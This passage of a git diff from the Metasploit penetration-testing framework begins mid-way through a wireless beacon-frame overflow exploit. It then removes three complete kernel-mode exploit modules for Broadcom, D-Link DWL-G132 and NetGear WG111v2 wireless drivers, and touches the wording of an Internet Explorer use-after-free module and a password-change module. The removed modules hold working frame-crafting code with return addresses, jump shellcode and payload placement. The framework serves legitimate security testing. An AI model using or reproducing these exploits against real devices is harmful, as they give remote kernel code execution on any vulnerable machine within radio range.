||||||
inc eax
|
|
||||||
mov edx, eax
|
|
||||||
;xchg dl, [esi] ; already unlocked
|
|
||||||
xchg al, [esi+0x8C] ; release the lock!
|
|
||||||
|
|
||||||
pop esi
|
|
||||||
|
|
||||||
ret ; end of sta_iterate epilogue
|
|
||||||
|
|
||||||
; Else we don't return properly
|
|
||||||
#else
|
|
||||||
|
|
||||||
; we directly return from the syscall
|
|
||||||
iret
|
|
||||||
|
|
||||||
#endif
|
|
||||||
|
|
||||||
.offset 64*2+21
|
|
||||||
|
|
||||||
; chunk2
|
|
||||||
back1:
|
|
||||||
jmp.i back2
|
|
||||||
dd 0 ; this MUST be zero
|
|
||||||
|
|
||||||
; chunk3
|
|
||||||
dd 0, 0, 0, 0 ; end_buf, current_ev, ieee, iwscanreq
|
|
||||||
|
|
||||||
; chunk4
|
|
||||||
db #{len-6} dup(0x33)
|
|
||||||
;dd 0xffffe777 ; addr of 'jmp esp' in vdso page
|
|
||||||
dd #{jmpesp}
|
|
||||||
jmp.i8 back1
|
|
||||||
; assert
|
|
||||||
.offset 198
|
|
||||||
;.padto 198 ; assert
|
|
||||||
EOS
|
|
||||||
wiframe.encoded.patch("metasc", "metascend", payload.encoded)
|
|
||||||
value = wiframe.encode_string
|
|
||||||
|
|
||||||
#, 'monadresseip'=>(('172.24.94.252'.split('.').reverse.inject(0) { |ip, byte| (ip << 8) | byte.to_i }) ^ 0xffffffff)
|
|
||||||
|
|
||||||
#puts value[-10..-1].unpack('C*').map { |i| i.to_s 16 }.join(',')
|
|
||||||
|
|
||||||
if (len == 24 and value.length != 198)
|
|
||||||
fail_with(Failure::BadConfig, "Value is too big! #{value.length}")
|
|
||||||
end
|
|
||||||
|
|
||||||
buf = "\xdd" + value.length.chr + value
|
|
||||||
|
|
||||||
frame =
|
|
||||||
"\x80" + # type/subtype
|
|
||||||
"\x00" + # flags
|
|
||||||
"\x00\x00" + # duration
|
|
||||||
eton(datastore['ADDR_DST']) + # dst
|
|
||||||
bssid + # src
|
|
||||||
bssid + # bssid
|
|
||||||
seq + # seq
|
|
||||||
Rex::Text.rand_text(8) + # timestamp value
|
|
||||||
"\x64\x00" + # beacon interval
|
|
||||||
"\x01\x00" + # capabilities
|
|
||||||
|
|
||||||
# ssid IE
|
|
||||||
"\x00" + ssid.length.chr + ssid +
|
|
||||||
|
|
||||||
# supported rates IE
|
|
||||||
"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" +
|
|
||||||
|
|
||||||
# channel IE
|
|
||||||
"\x03" + "\x01" + channel.chr +
|
|
||||||
|
|
||||||
# invalid wpa IE buffer overflow
|
|
||||||
# wpa ie is an example, still valid for other IEs
|
|
||||||
buf
|
|
||||||
|
|
||||||
return frame
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Name' => "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",
|
'Name' => "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits an use after free condition on Internet Explorer as used in the wild
|
This module exploits an use after free condition on Internet Explorer as used in the wild
|
||||||
on the "Operation SnowMan" in February 2014. The module uses Flash Player 12 in order to
|
as part of "Operation SnowMan" in February 2014. The module uses Flash Player 12 in order to
|
||||||
bypass ASLR and finally DEP.
|
bypass ASLR and DEP.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
|
|
@ -1,199 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
|
||||||
Rank = LowRanking
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Exploit::KernelMode
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow',
|
|
||||||
'Description' => %q{
|
|
||||||
This module exploits a stack buffer overflow in the Broadcom Wireless driver
|
|
||||||
that allows remote code execution in kernel mode by sending a 802.11 probe
|
|
||||||
response that contains a long SSID. The target MAC address must
|
|
||||||
be provided to use this exploit. The two cards tested fell into the
|
|
||||||
00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.
|
|
||||||
|
|
||||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
|
||||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
|
||||||
(external/ruby-lorcon/README) for more information.
|
|
||||||
},
|
|
||||||
'Author' =>
|
|
||||||
[
|
|
||||||
'Chris Eagle', # initial discovery
|
|
||||||
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>', # the man with the plan
|
|
||||||
'skape', # windows kernel ninjitsu and debugging
|
|
||||||
'hdm' # porting the C version to ruby
|
|
||||||
],
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
['CVE', '2006-5882'],
|
|
||||||
['OSVDB', '30294'],
|
|
||||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'],
|
|
||||||
],
|
|
||||||
'Privileged' => true,
|
|
||||||
'DefaultOptions' =>
|
|
||||||
{
|
|
||||||
'EXITFUNC' => 'thread',
|
|
||||||
},
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Space' => 500
|
|
||||||
},
|
|
||||||
'Platform' => 'win',
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
|
|
||||||
[ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10',
|
|
||||||
{
|
|
||||||
'Ret' => 0x8066662c, # jmp edi
|
|
||||||
'Platform' => 'win',
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'ExtendedOptions' =>
|
|
||||||
{
|
|
||||||
'Stager' => 'sud_syscall_hook',
|
|
||||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
|
||||||
'Recovery' => 'idlethread_restart',
|
|
||||||
'KiIdleLoopAddress' => 0x804dbb27,
|
|
||||||
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
],
|
|
||||||
|
|
||||||
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
|
|
||||||
[ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10',
|
|
||||||
{
|
|
||||||
'Ret' => 0x804f16eb, # jmp edi
|
|
||||||
'Platform' => 'win',
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'ExtendedOptions' =>
|
|
||||||
{
|
|
||||||
'Stager' => 'sud_syscall_hook',
|
|
||||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
|
||||||
'Recovery' => 'idlethread_restart',
|
|
||||||
'KiIdleLoopAddress' => 0x804dc0c7,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
]
|
|
||||||
],
|
|
||||||
'DefaultTarget' => 0,
|
|
||||||
'DisclosureDate' => 'Nov 11 2006'
|
|
||||||
))
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
|
|
||||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
stime = Time.now.to_i
|
|
||||||
|
|
||||||
print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...")
|
|
||||||
|
|
||||||
while (stime + datastore['RUNTIME'].to_i > Time.now.to_i)
|
|
||||||
|
|
||||||
select(nil, nil, nil, 0.02)
|
|
||||||
wifi.write(create_response)
|
|
||||||
|
|
||||||
select(nil, nil, nil, 0.01)
|
|
||||||
wifi.write(create_beacon)
|
|
||||||
|
|
||||||
break if session_created?
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("Finished sending frames...")
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_beacon
|
|
||||||
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
|
|
||||||
dst = eton('FF:FF:FF:FF:FF:FF')
|
|
||||||
seq = [Time.now.to_i % 4096].pack('n')
|
|
||||||
|
|
||||||
blob = create_frame
|
|
||||||
blob[0,1] = 0x80.chr
|
|
||||||
blob[4,6] = dst
|
|
||||||
blob[10,6] = src
|
|
||||||
blob[16,6] = src
|
|
||||||
blob[22,2] = seq
|
|
||||||
|
|
||||||
blob
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_response
|
|
||||||
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
|
|
||||||
dst = eton(datastore['ADDR_DST'])
|
|
||||||
seq = [Time.now.to_i % 256].pack('n')
|
|
||||||
|
|
||||||
blob = create_frame
|
|
||||||
blob[0,1] = 0x50.chr
|
|
||||||
blob[4,6] = dst
|
|
||||||
blob[10,6] = src
|
|
||||||
blob[16,6] = src # bssid field, good idea to set to src.
|
|
||||||
blob[22,2] = seq
|
|
||||||
|
|
||||||
blob
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_frame
|
|
||||||
"\x80" + # type/subtype
|
|
||||||
"\x00" + # flags
|
|
||||||
"\x00\x00" + # duration
|
|
||||||
eton(datastore['ADDR_DST']) + # dst
|
|
||||||
"\x58\x58\x58\x58\x58\x58" + # src
|
|
||||||
"\x58\x58\x58\x58\x58\x58" + # bssid
|
|
||||||
"\x70\xed" + # sequence number
|
|
||||||
|
|
||||||
#
|
|
||||||
# fixed parameters
|
|
||||||
#
|
|
||||||
|
|
||||||
# timestamp value
|
|
||||||
rand_text_alphanumeric(8) +
|
|
||||||
"\x64\x00" + # beacon interval
|
|
||||||
"\x11\x04" + # capability flags
|
|
||||||
|
|
||||||
#
|
|
||||||
# tagged parameters
|
|
||||||
#
|
|
||||||
|
|
||||||
# ssid tag
|
|
||||||
"\x00" + # tag: SSID parameter set
|
|
||||||
"\x5d" + # len: length is 93 bytes
|
|
||||||
|
|
||||||
# jump into the payload
|
|
||||||
"\x89\xf9" + # mov edi, ecx
|
|
||||||
"\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b
|
|
||||||
"\xff\xe1" + # jmp ecx
|
|
||||||
|
|
||||||
# padding
|
|
||||||
rand_text_alphanumeric(79) +
|
|
||||||
|
|
||||||
# return address
|
|
||||||
[target.ret].pack('V') +
|
|
||||||
|
|
||||||
# vendor specific tag
|
|
||||||
"\xdd" + # wpa
|
|
||||||
"\xff" + # big as we can make it
|
|
||||||
|
|
||||||
# the kernel-mode stager
|
|
||||||
payload.encoded
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -1,195 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
|
||||||
Rank = LowRanking
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Exploit::KernelMode
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow',
|
|
||||||
'Description' => %q{
|
|
||||||
This module exploits a stack buffer overflow in the A5AGU.SYS driver provided
|
|
||||||
with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow
|
|
||||||
allows remote code execution in kernel mode. The stack buffer overflow is triggered
|
|
||||||
when a 802.11 Beacon frame is received that contains a long Rates information
|
|
||||||
element. This exploit was tested with version 1.0.1.41 of the
|
|
||||||
A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
|
|
||||||
versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
|
|
||||||
adapter and appear to resolve this flaw, but D-Link does not offer an updated
|
|
||||||
driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
|
|
||||||
all cards within range of the attack will be affected. The tested adapter used
|
|
||||||
a MAC address in the range of 00:11:95:f2:XX:XX.
|
|
||||||
|
|
||||||
Vulnerable clients will need to have their card in a non-associated state
|
|
||||||
for this exploit to work. The easiest way to reproduce this bug is by starting
|
|
||||||
the exploit and then accessing the Windows wireless network browser and
|
|
||||||
forcing it to refresh.
|
|
||||||
|
|
||||||
D-Link was NOT contacted about this flaw. A search of the SecurityFocus
|
|
||||||
database indicates that D-Link has not provided an official patch or
|
|
||||||
solution for any of the seven flaws listed at the time of writing:
|
|
||||||
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
|
|
||||||
|
|
||||||
As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the
|
|
||||||
DWL-G132 driver (v1.21).
|
|
||||||
|
|
||||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
|
||||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
|
||||||
(external/ruby-lorcon/README) for more information.
|
|
||||||
},
|
|
||||||
'Author' =>
|
|
||||||
[
|
|
||||||
'hdm', # discovery, exploit dev
|
|
||||||
'skape', # windows kernel ninjitsu
|
|
||||||
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>' # making all of this possible
|
|
||||||
],
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
['CVE', '2006-6055'],
|
|
||||||
['OSVDB', '30296'],
|
|
||||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'],
|
|
||||||
['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'],
|
|
||||||
],
|
|
||||||
'Privileged' => true,
|
|
||||||
|
|
||||||
'DefaultOptions' =>
|
|
||||||
{
|
|
||||||
'EXITFUNC' => 'thread',
|
|
||||||
},
|
|
||||||
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
# Its a beautiful day in the neighborhood...
|
|
||||||
'Space' => 1000
|
|
||||||
},
|
|
||||||
'Platform' => 'win',
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
# Windows XP SP2 with the latest updates
|
|
||||||
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
|
|
||||||
[ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41',
|
|
||||||
{
|
|
||||||
'Ret' => 0x8066662c, # jmp edi
|
|
||||||
'Platform' => 'win',
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'ExtendedOptions' =>
|
|
||||||
{
|
|
||||||
'Stager' => 'sud_syscall_hook',
|
|
||||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
|
||||||
'Recovery' => 'idlethread_restart',
|
|
||||||
'KiIdleLoopAddress' => 0x804dbb27,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
],
|
|
||||||
|
|
||||||
# Windows XP SP2 install media, no patches
|
|
||||||
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
|
|
||||||
[ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41',
|
|
||||||
{
|
|
||||||
'Ret' => 0x804f16eb, # jmp edi
|
|
||||||
'Platform' => 'win',
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'ExtendedOptions' =>
|
|
||||||
{
|
|
||||||
'Stager' => 'sud_syscall_hook',
|
|
||||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
|
||||||
'Recovery' => 'idlethread_restart',
|
|
||||||
'KiIdleLoopAddress' => 0x804dc0c7,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
]
|
|
||||||
],
|
|
||||||
'DefaultTarget' => 0,
|
|
||||||
'DisclosureDate' => 'Nov 13 2006'))
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
|
|
||||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
stime = Time.now.to_i
|
|
||||||
rtime = datastore['RUNTIME'].to_i
|
|
||||||
count = 0
|
|
||||||
|
|
||||||
print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
|
|
||||||
while (stime + rtime > Time.now.to_i)
|
|
||||||
wifi.write(create_beacon)
|
|
||||||
select(nil, nil, nil, 0.10) if (count % 100 == 0)
|
|
||||||
|
|
||||||
count += 1
|
|
||||||
|
|
||||||
# Exit if we get a session
|
|
||||||
break if session_created?
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("Completed sending beacons.")
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
#
|
|
||||||
# The following research was provided by Gil Dabah of ZERT
|
|
||||||
#
|
|
||||||
# The long rates field bug can be triggered three different ways (at least):
|
|
||||||
# 1) Send a single rates IE with valid rates up front and long data
|
|
||||||
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
|
|
||||||
# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
|
|
||||||
#
|
|
||||||
|
|
||||||
def create_beacon
|
|
||||||
|
|
||||||
ssid = rand_text_alphanumeric(6)
|
|
||||||
bssid = ("\x00" * 2) + rand_text(4)
|
|
||||||
src = ("\x90" * 4) + "\xeb\x2b"
|
|
||||||
seq = [rand(255)].pack('n')
|
|
||||||
|
|
||||||
buff = rand_text(75)
|
|
||||||
buff[0, 2] = "\xeb\x49"
|
|
||||||
buff[71, 4] = [target.ret].pack('V')
|
|
||||||
|
|
||||||
frame =
|
|
||||||
"\x80" + # type/subtype
|
|
||||||
"\x00" + # flags
|
|
||||||
"\x00\x00" + # duration
|
|
||||||
eton(datastore['ADDR_DST']) + # dst
|
|
||||||
src + # src
|
|
||||||
bssid + # bssid
|
|
||||||
seq + # seq
|
|
||||||
rand_text(8) + # timestamp value
|
|
||||||
"\x64\x00" + # beacon interval
|
|
||||||
"\x00\x05" + # capability flags
|
|
||||||
|
|
||||||
# ssid tag
|
|
||||||
"\x00" + ssid.length.chr + ssid +
|
|
||||||
|
|
||||||
# supported rates
|
|
||||||
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
|
|
||||||
|
|
||||||
# current channel
|
|
||||||
"\x03" + "\x01" + channel.chr +
|
|
||||||
|
|
||||||
# eip was his name-o
|
|
||||||
"\x01" + buff.length.chr + buff +
|
|
||||||
|
|
||||||
payload.encoded
|
|
||||||
|
|
||||||
return frame
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -1,208 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
|
||||||
Rank = LowRanking
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Exploit::KernelMode
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'NetGear WG111v2 Wireless Driver Long Beacon Overflow',
|
|
||||||
'Description' => %q{
|
|
||||||
This module exploits a stack buffer overflow in the NetGear WG111v2 wireless
|
|
||||||
device driver. This stack buffer overflow allows remote code execution in kernel mode.
|
|
||||||
The stack buffer overflow is triggered when a 802.11 Beacon frame is received that
|
|
||||||
contains more than 1100 bytes worth of information elements.
|
|
||||||
|
|
||||||
This exploit was tested with version 5.1213.6.316 of the WG111v2.SYS driver and
|
|
||||||
a NetGear WG111v2 USB adapter. Since this vulnerability is exploited via beacon frames,
|
|
||||||
all cards within range of the attack will be affected. The tested adapter used
|
|
||||||
a MAC address in the range of 00:18:4d:02:XX:XX.
|
|
||||||
|
|
||||||
Vulnerable clients will need to have their card in a non-associated state
|
|
||||||
for this exploit to work. The easiest way to reproduce this bug is by starting
|
|
||||||
the exploit and then unplugging and reinserting the USB card. The exploit can
|
|
||||||
take up to a minute to execute the payload, depending on system activity.
|
|
||||||
|
|
||||||
NetGear was NOT contacted about this flaw. A search of the SecurityFocus
|
|
||||||
database indicates that NetGear has not provided an official patch or
|
|
||||||
solution for any of the thirty flaws listed at the time of writing. This list
|
|
||||||
includes BIDs: 1010, 3876, 4024, 4111, 5036, 5667, 5830, 5943, 5940, 6807, 7267, 7270,
|
|
||||||
7371, 7367, 9194, 10404, 10459, 10585, 10935, 11580, 11634, 12447, 15816, 16837,
|
|
||||||
16835, 19468, and 19973.
|
|
||||||
|
|
||||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
|
||||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
|
||||||
(external/ruby-lorcon/README) for more information.
|
|
||||||
},
|
|
||||||
'Author' => [ 'hdm' ],
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
['CVE', '2006-5972'],
|
|
||||||
['OSVDB', '30473'],
|
|
||||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-16-11-2006.html'],
|
|
||||||
],
|
|
||||||
'Privileged' => true,
|
|
||||||
|
|
||||||
'DefaultOptions' =>
|
|
||||||
{
|
|
||||||
'EXITFUNC' => 'thread',
|
|
||||||
},
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
# Its a beautiful day in the neighborhood...
|
|
||||||
'Space' => 1000,
|
|
||||||
},
|
|
||||||
'Platform' => 'win',
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
# Windows XP SP2 with the latest updates
|
|
||||||
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
|
|
||||||
[ 'Windows XP SP2 (5.1.2600.2122), WG111v2.SYS 5.1213.6.316',
|
|
||||||
{
|
|
||||||
'Ret' => 0x80502d7f, # jmp esp
|
|
||||||
'Platform' => 'win',
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'ExtendedOptions' =>
|
|
||||||
{
|
|
||||||
'Stager' => 'sud_syscall_hook',
|
|
||||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
|
||||||
'Recovery' => 'idlethread_restart',
|
|
||||||
'KiIdleLoopAddress' => 0x804dbb27,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
],
|
|
||||||
|
|
||||||
# Windows XP SP2 install media, no patches
|
|
||||||
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
|
|
||||||
[ 'Windows XP SP2 (5.1.2600.2180), WG111v2.SYS 5.1213.6.316',
|
|
||||||
{
|
|
||||||
'Ret' => 0x804ed5cb, # jmp esp
|
|
||||||
'Platform' => 'win',
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'ExtendedOptions' =>
|
|
||||||
{
|
|
||||||
'Stager' => 'sud_syscall_hook',
|
|
||||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
|
||||||
'Recovery' => 'idlethread_restart',
|
|
||||||
'KiIdleLoopAddress' => 0x804dc0c7,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
]
|
|
||||||
],
|
|
||||||
'DefaultTarget' => 0,
|
|
||||||
'DisclosureDate' => 'Nov 16 2006'))
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
|
|
||||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
stime = Time.now.to_i
|
|
||||||
rtime = datastore['RUNTIME'].to_i
|
|
||||||
count = 0
|
|
||||||
|
|
||||||
print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
|
|
||||||
while (stime + rtime > Time.now.to_i)
|
|
||||||
wifi.write(create_beacon)
|
|
||||||
select(nil, nil, nil, 0.10) if (count % 100 == 0)
|
|
||||||
|
|
||||||
count += 1
|
|
||||||
|
|
||||||
# Exit if we get a session
|
|
||||||
break if session_created?
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("Completed sending beacons.")
|
|
||||||
end
|
|
||||||
|
|
||||||
# Convert arbitrary data into a series of information elements
|
|
||||||
def ie_padding(data)
|
|
||||||
ret = 0
|
|
||||||
idx = 0
|
|
||||||
len = 0
|
|
||||||
|
|
||||||
while(idx < data.length)
|
|
||||||
len = data[idx+1]
|
|
||||||
if (! len)
|
|
||||||
data << "\x00"
|
|
||||||
len = 0
|
|
||||||
end
|
|
||||||
|
|
||||||
idx += len + 2
|
|
||||||
end
|
|
||||||
|
|
||||||
data << yield(idx - data.length)
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_beacon
|
|
||||||
|
|
||||||
ssid = rand_text_alphanumeric(16)
|
|
||||||
bssid = ("\x00" * 2) + rand_text(4)
|
|
||||||
src = ("\x00" * 2) + rand_text(4)
|
|
||||||
seq = [rand(255)].pack('n')
|
|
||||||
stamp = rand_text(8)
|
|
||||||
|
|
||||||
frame =
|
|
||||||
"\x80" + # type/subtype
|
|
||||||
"\x00" + # flags
|
|
||||||
"\x00\x00" + # duration
|
|
||||||
eton(datastore['ADDR_DST']) + # dst
|
|
||||||
src + # src
|
|
||||||
bssid + # bssid
|
|
||||||
seq + # seq
|
|
||||||
stamp + # timestamp value
|
|
||||||
"\x64\x00" + # beacon interval
|
|
||||||
rand_text(2) + # capability flags
|
|
||||||
|
|
||||||
# ssid tag
|
|
||||||
"\x00" + ssid.length.chr + ssid +
|
|
||||||
|
|
||||||
# supported rates
|
|
||||||
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
|
|
||||||
|
|
||||||
# current channel
|
|
||||||
"\x03" + "\x01" + channel.chr
|
|
||||||
|
|
||||||
# Bounce through EDI to the uncorrupted payload
|
|
||||||
jumper =
|
|
||||||
"\x6a\x39" + # push byte +0x39
|
|
||||||
"\x58" + # pop eax
|
|
||||||
"\x01\xc7" + # add edi, eax
|
|
||||||
"\xff\xe7" # jmp edi
|
|
||||||
|
|
||||||
# Overwrite enough to pop the return
|
|
||||||
buf = rand_text(1160)
|
|
||||||
|
|
||||||
# Kernel-mode stager fun goes here
|
|
||||||
buf[0, payload.encoded.length] = payload.encoded
|
|
||||||
|
|
||||||
# Return address is a jmp ESP
|
|
||||||
buf[1101, 4] = [ target.ret ].pack('V')
|
|
||||||
|
|
||||||
# Jump back to EDI + 0x39
|
|
||||||
buf[1113, jumper.length] = jumper
|
|
||||||
|
|
||||||
# Pad it out to be a valid set of IEs
|
|
||||||
frame << ie_padding(buf) {|c| rand_text(c) }
|
|
||||||
|
|
||||||
return frame
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -11,10 +11,11 @@ class Metasploit3 < Msf::Post
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => "Windows Manage Change Password",
|
'Name' => "Windows Manage Change Password",
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module will attempt to change the password of the targetted account.
|
This module will attempt to change the password of the targeted account.
|
||||||
Its main purpose is when you have valid credentials on a remote host but
|
The typical usage is to change a newly created account's password on a
|
||||||
they require a password change before you can login e.g.
|
remote host to avoid the error, 'System error 1907 has occurred,' which
|
||||||
'System error 1907 has occurred.'
|
is caused when the account policy enforces a password change before the
|
||||||
|
next login.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => ['win'],
|
'Platform' => ['win'],
|
||||||
|
@ -33,7 +34,7 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
def run
|
def run
|
||||||
unless client.railgun
|
unless client.railgun
|
||||||
print_error('This module requires a native windows payload that supports railgun.')
|
print_error('This module requires a native Windows payload that supports Railgun.')
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -1,79 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
require 'rex'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Post
|
|
||||||
require 'msf/core/module/deprecated'
|
|
||||||
include Msf::Module::Deprecated
|
|
||||||
deprecated Date.new(2014, 03, 24), 'post/multi/gather/resolve_hosts'
|
|
||||||
|
|
||||||
def initialize(info={})
|
|
||||||
super( update_info( info,
|
|
||||||
'Name' => 'Windows Recon Resolve Hostname',
|
|
||||||
'Description' => %q{
|
|
||||||
This module resolves a hostname to IP address via the victim,
|
|
||||||
